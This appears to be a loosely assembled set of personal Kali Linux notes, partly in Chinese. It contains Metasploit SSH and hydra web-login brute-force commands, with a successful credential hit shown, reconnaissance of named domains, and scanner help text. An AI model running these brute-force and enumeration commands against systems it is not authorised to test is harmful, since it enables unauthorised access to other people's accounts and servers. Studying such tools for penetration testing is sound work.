msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS ********* RHOSTS => ********* msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME test USERNAME => test msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/ .ICEauthority .config .hushlogin .python_history Desktop Public .Xauthority .dbus .local .viminfo Documents Templates .bash_history .face .msf4 .vnc Downloads Videos .bashrc .face.icon .pip .zsh_history Music tools .cache .gnupg .profile .zshrc Pictures msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/pass passlist password.txt msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/tools/穷举工具/password.txt PASS_FILE => /root/tools/穷举工具/password.txt msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current data base DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all usersin the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /root/tools/穷举工具/password.txt no File containing passwords, one per line RHOSTS ********** yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port STOP_ON_SUCCESS falseyes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME test no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE falseyes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS teur [-] The following options failed to validate: Value 'teur' is not valid for option 'STOP_ON_SUCCESS'. STOP_ON_SUCCESS => false msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf6 auxiliary(scanner/ssh/ssh_login) > run
[+] ************:22 - Success: 'test:123456''Could not chdir to home directory /home/test: No such file or directory This account is currently not available. Could not chdir to home directory /home/test: No such file or directory This account is currently not available. ' [-] *************:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/ssh/ssh_login) >
用法 msfconsole msf auxiliary(mysql_login) > set PASS_FILE /root/passlist.txt PASS_FILE => /root/passlist.txt msf auxiliary(mysql_login) > set USERNAME root USERNAME => root msf auxiliary(mysql_login) > run set 设置 show options 查询设置 back 返回 info 查询模块的信息 exploit/run 运行模块
deb https://mirrors.huaweicloud.com/kali kali-rolling main non-free contrib deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb https://http.kali.org/kali kali-rolling main non-free contrib
#deb-src https://mirrors.huaweicloud.com/kali kali-rolling main non-free contrib #deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #deb-src http://http.kali.org/kali kali-rolling main non-free contrib
安装apt-fast加速更新源
1
vim /etc/apt/sources.list.d/apt-fast.list
1 2
deb [arch=amd64 signed-by=/etc/apt/trusted.gpg.d/apt-fast.gpg] http://ppa.launchpad.net/apt-fast/stable/ubuntu bionic main #deb-src [arch=amd64 signed-by=/etc/apt/trusted.gpg.d/apt-fast.gpg] http://ppa.launchpad.net/apt-fast/stable/ubuntu bionic main
目前显示的信息 Linux kali 5.18.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.16-1kali1 (2022-08-31) x86_64
The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Oct 9 17:04:06 2022 from 10.0.0.1 ┏━(Message from Kali developers) ┃ ┃ This is a minimal installation of Kali Linux, you likely ┃ want to install supplementary tools. Learn how: ┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/ ┃ ┗━(Run: “touch ~/.hushlogin” to hide this message)
❯ cat /etc/issue.net Kali GNU/Linux Rolling 网络登陆显示的信息,登录后显示,需要由sshd配置
1 2 3 4 5 6 7 8
❯ cat /etc/motd
The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
1 2 3 4
ls /etc/profile.d/ 查看这里的文件 ❯ ls /etc/profile.d/ kali.sh sysinfo.sh
发现还有信息 Linux kali 5.18.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.16-1kali1 (2022-08-31) x86_64 Last login: Sun Oct 9 17:32:27 2022 from 10.0.0.1
接着查找 grep -nr "Linux kali 5.18.0-kali7-amd64" /
发现 此文件 /run/motd.dynamic ❯ cat /run/motd.dynamic Linux kali 5.18.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.16-1kali1 (2022-08-31) x86_64
# don't edit below here functiondisplay() { # $1=name $2=value $3=red_limit $4=minimal_show_limit $5=unit $6=after $7=acs/desc{ # battery red color is opposite, lower number if [[ "$1" == "Battery" ]]; then local great="<"; else local great=">"; fi if [[ -n "$2" && "$2" > "0" && (( "${2%.*}" -ge "$4" )) ]]; then printf"%-14s%s""$1:" if awk "BEGIN{exit ! ($2$great$3)}"; then echo -ne "\e[0;91m $2"; else echo -ne "\e[0;92m $2"; fi printf"%-1s%s\x1B[0m""$5" printf"%-11s%s\t""$6" return 1 fi } # display
functionget_ip_addresses() { local ips=() for f in /sys/class/net/*; do local intf=$(basename$f) # match only interface names starting with e (Ethernet), br (bridge), w (wireless), r (some Ralink drivers use ra<number> format) if [[ $intf =~ $SHOW_IP_PATTERN ]]; then local tmp=$(ip -4 addr show dev $intf | awk '/inet/ {print $2}' | cut -d'/' -f1) # add both name and IP - can be informative but becomes ugly with long persistent/predictable device names #[[ -n $tmp ]] && ips+=("$intf: $tmp") # add IP only [[ -n $tmp ]] && ips+=("$tmp") fi done echo"${ips[@]}" } # get_ip_addresses
# query various systems and send some stuff to the background for overall faster execution. # Works only with ambienttemp and batteryinfo since A20 is slow enough :) storage_info critical_load=$(( 1 + $(grep -c processor /proc/cpuinfo) / 2 ))
+++ AHCI Link Power Management (ALPM) No AHCI-enabled host controller detected.
+++ AHCI Host Controller Runtime Power Management /sys/bus/pci/devices/0000:00:01.1/ata1/power/control = on /sys/bus/pci/devices/0000:00:01.1/ata2/power/control = on
+++ Wireless bluetooth = none (no device) wifi = none (no device) wwan = none (no device)
+++ Audio
+++ PCIe Active State Power Management /sys/module/pcie_aspm/parameters/policy = [default] performance powersave powersupersave (using BIOS preferences)
+++ Runtime Power Management Device blacklist = (not configured) Driver blacklist = amdgpu mei_me nouveau nvidia pcieport radeon
/sys/bus/pci/devices/0000:00:00.0/power/control = on (0x060000, Host bridge, no driver) /sys/bus/pci/devices/0000:00:01.0/power/control = on (0x060100, ISA bridge, no driver) /sys/bus/pci/devices/0000:00:01.1/power/control = on (0x010180, IDE interface, ata_piix) /sys/bus/pci/devices/0000:00:01.2/power/control = on (0x0c0300, USB controller, uhci_hcd) /sys/bus/pci/devices/0000:00:01.3/power/control = on (0x068000, Bridge, piix4_smbus) /sys/bus/pci/devices/0000:00:02.0/power/control = on (0x030000, VGA compatible controller, cirrus) /sys/bus/pci/devices/0000:00:03.0/power/control = on (0x060400, PCI bridge, no driver) /sys/bus/pci/devices/0000:00:04.0/power/control = on (0x060400, PCI bridge, no driver) /sys/bus/pci/devices/0000:00:05.0/power/control = on (0x020000, Ethernet controller, virtio-pci) /sys/bus/pci/devices/0000:00:06.0/power/control = on (0x010000, SCSI storage controller, virtio-pci) /sys/bus/pci/devices/0000:00:07.0/power/control = on (0x00ff00, Unclassified device [00ff], virtio-pci)
/usr/share/wordlists 14m 26s root@kali 0.03 15:40:29 ❯ hydra -l admin -P ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&pw=^pw^:F=/index.php?action=login" -vV Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
It has the highest level of permissions on the local system.
If the client and the server are both in a domain, then the Local System account uses the PC account (hostname$) to login on the remote computer.
If the client or the server is not in a domain, then the Local System account uses ANONYMOUS LOGON. ●Local Service(NT AUTHORITY\Local Service): 预设的拥有最小权限的本地账户
It has permissions as an unpriviledge normal user on the local system.
It always uses ANONYMOUS LOGON, whether a computer is in a domain or not. ●Network Service(NT AUTHORITY\Network Service): 具有运行网络服务权限的计算机账户
It has permissions as an unpriviledge normal user on the local system.
When accessing the network, it behaves the same as the Local System account. . ●TrustedInstaller C:\Windows\servicing
┌──(root💀B)-[~] └─# dmitry -iwns dansemal.cn Deepmagic Information Gathering Tool "There be some deep magic going on"
HostIP:183.240.60.175 HostName:dansemal.cn
Gathered Inet-whois information for 183.240.60.175 ---------------------------------
inetnum: 182.161.64.0 - 184.255.255.255 netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK descr: IPv4 address block not managed by the RIPE NCC remarks: ------------------------------------------------------ remarks: ration information, remarks: you can consult the following sources: remarks: remarks: IANA remarks: http://www.iana.org/assignments/ipv4-address-space remarks: http://www.iana.org/assignments/iana-ipv4-special-registry remarks: http://www.iana.org/assignments/ipv4-recovered-address-space remarks: remarks: AFRINIC (Africa) remarks: http://www.afrinic.net/ whois.afrinic.net remarks: remarks: APNIC (Asia Pacific) ic.net/ whois.apnic.net remarks: remarks: ARIN (Northern America) remarks: http://www.arin.net/ whois.arin.net remarks: remarks: LACNIC (Latin America and the Carribean) remarks: http://www.lacnic.net/ whois.lacnic.net remarks: remarks: ------------------------------------------------------ country: EU # Country is really world wide admin-c: IANA1-RIPE tech-c: IANA1-RIPE status: ALLOCATED UNSPECIFIED
created: 2021-12-21T16:03:56Z last-modified: 2021-12-21T16:03:56Z source: RIPE role: Internet Assigned Numbers Authority address: see http://www.iana.org. admin-c: IANA1-RIPE tech-c: IANA1-RIPE nic-hdl: IANA1-RIPE remarks: For more information on IANA services remarks: go to IANA web site at http://www.iana.org. mnt-by: RIPE-NCC-MNT created: 1970-01-01T00:00:00Z last-modified: 2001-09-22T09:31:27Z source: RIPE # Filtered % This query was served by the RIPE Database Query Service version 1.102.2 (HEREFORD)
Gathered Inic-whois information for dansemal.cn --------------------------------- Domain Name: dansemal.cn ROID: 20210322s10001s35063278-cn Domain Status: clientTransferProhibited Registrant: 该域名已采取WHOIS隐私保护服务 Sponsoring Registrar: 广州云讯信息科技有限公司 Name Server: brook.dnspod.net Name Server: record.dnspod.net Registration Time: 2021-03-22 15:32:05 Expiration Time: 2023-03-22 15:32:05 DNSSEC: signedDelegation
Gathered Netcraft information for dansemal.cn ---------------------------------
Retrieving Netcraft.com information for dansemal.cn Netcraft.com Information gathered
Gathered Subdomain information for dansemal.cn --------------------------------- Searching Google.com:80... HostName:www.dansemal.cn HostIP:183.240.60.174 HostName:cloud.dansemal.cn HostIP:112.3.31.146 Searching Altavista.com:80... Found 2 possible subdomain(s) for host dansemal.cn, Searched 0 pages containing 0 results
[-] Enumerating subdomains now for qq.com [-] Searching now in Baidu.. [-] Searching now in Yahoo.. [-] Searching now in Google.. [-] Searching now in Bing.. [-] Searching now in Ask.. [-] Searching now in Netcraft.. [-] Searching now in DNSdumpster.. [-] Searching now in Virustotal.. [-] Searching now in ThreatCrowd.. [-] Searching now in SSL Certificates.. [-] Searching now in PassiveDNS.. [-] Total Unique Subdomains Found: 2690 login.imqq.com localhost.ptlogin2.imqq.com ssl.ptlogin2.imqq.com ssl.ui.ptlogin2.imqq.com ssl.xui.ptlogin2.imqq.com www.qq.com 0.qq.com 007.qq.c 021.qq.com 1.qq.com 10.qq.com 100.qq.com file.100.qq.com res.100.qq.com 1000.qq.com 101.qq.com pick.101.qq.com game.108.qq.com 110.qq.com 1108.qq.com 111.qq.com 1111.qq.com 124bjg0.qq.com 12530.qq.com 176.qq.com 17roco.qq.com m.17roco.qq.com m1.17roco.qq.com mres.17roco.qq.com
[-] Enumerating subdomains now for dansemal.cn [-] Searching now in Baidu.. [-] Searching now in Yahoo.. [-] Searching now in Google.. [-] Searching now in Bing.. [-] Searching now in Ask.. [-] Searching now in Netcraft.. [-] Searching now in DNSdumpster.. [-] Searching now in Virustotal.. [-] Searching now in ThreatCrowd.. [-] Searching now in SSL Certificates.. [-] Searching now in PassiveDNS.. [!] Error: Virustotal probably now is blocking our requests [-] Total Unique Subdomains Found: 12 www.dansemal.cn blog.dansemal.cn cdn.dansemal.cn cloud.dansemal.cn joe.dansemal.cn mail.dansemal.cn pl.dansemal.cn qh.dansemal.cn ur.dansemal.cn vercel.dansemal.cn vul.dansemal.cn waline.dansemal.cn
Options: -ask+ 是否询问提交更新 yes 每次 (default) no 不询问,不发送 auto 不询问,自动发送 -Cgidirs+ 扫描CGI目录: "none", "all", 或者 "/cgi/ /cgi-a/" -config+ 使用此配置文件 -Display+ 打开/关闭显示输出: 1 显示重定向 2 显示 cookies received 3 显示所有 200/OK响应 4 显示需要身份验证的URL D 调试输出 E 显示所有HTTP错误 P 打印进展到STDOUT S Scrub输出IPS和主机名 V 详细输出 -dbcheck 检查数据库和其他密钥文件的语法错误 -evasion+ 编码技术: 1 随机URI编码(非UTF8) 2 目录自我引用 (/./) 3 Premature URL ending 4 预置长随机字符串 5 Fake parameter 6 TAB as request spacer 7 Change the case of the URL 8 Use Windows directory separator (\) A Use a carriage return (0x0d) as a request spacer B Use binary value 0x0b as a request spacer -Format+ Save file (-o) format: csv Comma-separated-value json JSON Format htm HTML Format nbe Nessus NBE format sql Generic SQL (see docs for schema) txt Plain text xml XML Format (if not specified the format will be taken from the file extension passed to -output) -Help Extended help information -host+ Target host/URL -404code Ignore these HTTP codes as negative responses (always). Format is "302,301". -404string Ignore this string in response body content as negative response (always). Can be a regular expression. -id+ Host authentication to use, format is id:pass or id:pass:realm -key+ Client certificate key file -list-plugins List all available plugins, perform no testing -maxtime+ Maximum testing time per host (e.g., 1h, 60m, 3600s) -mutate+ Guess additional file names: 1 Test all files with all root directories 2 Guess for password file names 3 Enumerate user names via Apache (/~user type requests) 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) 5 Attempt to brute force sub-domain names, assume that the host name is the parent domain 6 Attempt to guess directory names from the supplied dictionary file -mutate-options Provide information for mutates -nointeractive Disables interactive features -nolookup Disables DNS lookups -nossl Disables the use of SSL -no404 Disables nikto attempting to guess a 404 page -Option Over-ride an option in nikto.conf, can be issued multiple times -output+ Write output to this file ('.' for auto-name) -Pause+ Pause between tests (seconds, integer or float) -Plugins+ List of plugins to run (default: ALL) -port+ Port to use (default 80) -RSAcert+ Client certificate file -root+ Prepend root value to all requests, format is /directory -Save Save positive responses to this directory ('.' for auto-name) -ssl Force ssl mode on port -Tuning+ Scan tuning: 1 Interesting File / Seen in logs 2 Misconfiguration / Default File 3 Information Disclosure 4 Injection (XSS/Script/HTML) 5 Remote File Retrieval - Inside Web Root 6 Denial of Service 7 Remote File Retrieval - Server Wide 8 Command Execution / Remote Shell 9 SQL Injection 0 File Upload a Authentication Bypass b Software Identification c Remote Source Inclusion d WebService e Administrative Console x Reverse Tuning Options (i.e., include all except specified) -timeout+ Timeout for requests (default 10 seconds) -Userdbs Load only user databases, not the standard databases all Disable standard dbs and load only user dbs tests Disable only db_tests and load udb_tests -useragent Over-rides the default useragent -until Run until the specified time or duration -update Update databases and plugins from CIRT.net -url+ Target host/URL (alias of -host) -useproxy Use the proxy defined in nikto.conf, or argument http://server:port -Version Print plugin and database versions -vhost+ Virtual host (for Host header) + requires a value
Options: --version show program's version number and exit -h, --help show this help message and exit
Mandatory: -u URL, --url=URL Target URL -l FILE, --url-list=FILE Target URL list file --stdin Target URL list from STDIN --cidr=CIDR Target CIDR --raw=FILE Load raw HTTP request from file (use `--scheme` flag to set the scheme) -e EXTENSIONS, --extensions=EXTENSIONS Extension list separated by commas (Example: php,asp) -X EXTENSIONS, --exclude-extensions=EXTENSIONS Exclude extension list separated by commas (Example: asp,jsp) -f, --force-extensions Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions
Dictionary Settings: -w WORDLIST, --wordlists=WORDLIST Customize wordlists (separated by commas) --prefixes=PREFIXES Add custom prefixes to all wordlist entries (separated by commas) --suffixes=SUFFIXES Add custom suffixes to all wordlist entries, ignore directories (separated by commas) --only-selected Remove paths have different extensions from selected ones via `-e` (keep entries don't have extensions) --remove-extensions Remove extensions in all paths (Example: admin.php -> admin) -U, --uppercase Uppercase wordlist -L, --lowercase Lowercase wordlist -C, --capital Capital wordlist
General Settings: -t THREADS, --threads=THREADS Number of threads -r, --recursive Brute-force recursively --deep-recursive Perform recursive scan on every directory depth (Example: api/users -> api/) --force-recursive Do recursive brute-force for every found path, not only paths end with slash -R DEPTH, --recursion-depth=DEPTH Maximum recursion depth --recursion-status=CODES Valid status codes to perform recursive scan, support ranges (separated by commas) --subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by commas) --exclude-subdirs=SUBDIRS Exclude the following subdirectories during recursive scan (separated by commas) -i CODES, --include-status=CODES Include status codes, separated by commas, support ranges (Example: 200,300-399) -x CODES, --exclude-status=CODES Exclude status codes, separated by commas, support ranges (Example: 301,500-599) --exclude-sizes=SIZES Exclude responses by sizes, separated by commas (Example: 123B,4KB) --exclude-texts=TEXTS Exclude responses by texts, separated by commas (Example: 'Not found', 'Error') --exclude-regexps=REGEXPS Exclude responses by regexps, separated by commas (Example: 'Not foun[a-z]{1}', '^Error$') --exclude-redirects=REGEXPS Exclude responses by redirect regexps or texts, separated by commas (Example: 'https://okta.com/*') --exclude-response=PATH Exclude responses by response of this page (path as input) --skip-on-status=CODES Skip target whenever hit one of these status codes, separated by commas, support ranges --minimal=LENGTH Minimal response length --maximal=LENGTH Maximal response length --max-time=SECONDS Maximal runtime for the scan -q, --quiet-mode Quiet mode --full-url Full URLs in the output (enabled automatically in quiet mode) --no-color No colored output
Request Settings: -m METHOD, --http-method=METHOD HTTP method (default: GET) -d DATA, --data=DATA HTTP request data -H HEADERS, --header=HEADERS HTTP request header, support multiple flags (Example: -H 'Referer: example.com') --header-list=FILE File contains HTTP request headers -F, --follow-redirects Follow HTTP redirects --random-agent Choose a random User-Agent for each request --auth-type=TYPE Authentication type (basic, digest, bearer, ntlm) --auth=CREDENTIAL Authentication credential (user:password or bearer token) --user-agent=USERAGENT --cookie=COOKIE
Connection Settings: --timeout=TIMEOUT Connection timeout -s DELAY, --delay=DELAY Delay between requests --proxy=PROXY Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088) --proxy-list=FILE File contains proxy servers --replay-proxy=PROXY Proxy to replay with found paths --scheme=SCHEME Default scheme (for raw request or if there is no scheme in the URL) --max-rate=RATE Max requests per second --retries=RETRIES Number of retries for failed requests -b, --request-by-hostname By default dirsearch requests by IP for speed. This will force dirsearch to request by hostname --ip=IP Server IP address --exit-on-error Exit whenever an error occurs
You can change the dirsearch default configurations (default extensions, timeout, wordlist location, ...) by editing the "/etc/dirsearch/default.conf" file. More information at https://github.com/maurosoria/dirsearch.
┌──(root💀kali)-[~] └─# nmap -v -A -p1-65535 127.0.0.1 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 13:58 CST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Initiating SYN Stealth Scan at 13:58 Scanning localhost (127.0.0.1) [65535 ports] Discovered open port 22/tcp on 127.0.0.1 Completed SYN Stealth Scan at 13:58, 0.37s elapsed (65535 total ports) Initiating Service scan at 13:58 Scanning 1 service on localhost (127.0.0.1) Completed Service scan at 13:58, 0.01s elapsed (1 service on 1 host) Initiating OS detection (try #1) against localhost (127.0.0.1) Retrying OS detection (try #2) against localhost (127.0.0.1) Retrying OS detection (try #3) against localhost (127.0.0.1) Retrying OS detection (try #4) against localhost (127.0.0.1) Retrying OS detection (try #5) against localhost (127.0.0.1) NSE: Script scanning 127.0.0.1. Initiating NSE at 13:58 Completed NSE at 13:58, 0.08s elapsed Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Nmap scan report for localhost (127.0.0.1) Host is up (0.000018s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 95:24:8a:70:02:c1:7c:b9:63:1d:57:bd:c4:ba:59:84 (RSA) | 256 ac:24:26:ce:c9:34:47:e7:62:38:13:d1:03:6d:c7:54 (ECDSA) |_ 256 79:e3:be:ae:1e:ee:87:ed:bd:3d:b3:23:e6:de:92:08 (ED25519) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=4/10%OT=22%CT=1%CU=43844%PV=N%DS=0%DC=L%G=Y%TM=60713E8 OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=MFFD7ST11NWA%O2=MFFD7ST11NWA%O3=MFFD7NNT11NWA%O4=MFFD7ST11NWA%O5=MFF OS:D7ST11NWA%O6=MFFD7ST11)WIN(W1=FFCB%W2=FFCB%W3=FFCB%W4=FFCB%W5=FFCB%W6=FF OS:CB)ECN(R=Y%DF=Y%T=40%W=FFD7%O=MFFD7NNSNWA%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R= OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N% OS:T=40%CD=S)
Uptime guess: 22.103 days (since Fri Mar 19 11:30:10 2021) Network Distance: 0 hops TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning. Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Initiating NSE at 13:58 Completed NSE at 13:58, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds Raw packets sent: 65645 (2.892MB) | Rcvd: 131283 (5.520MB)
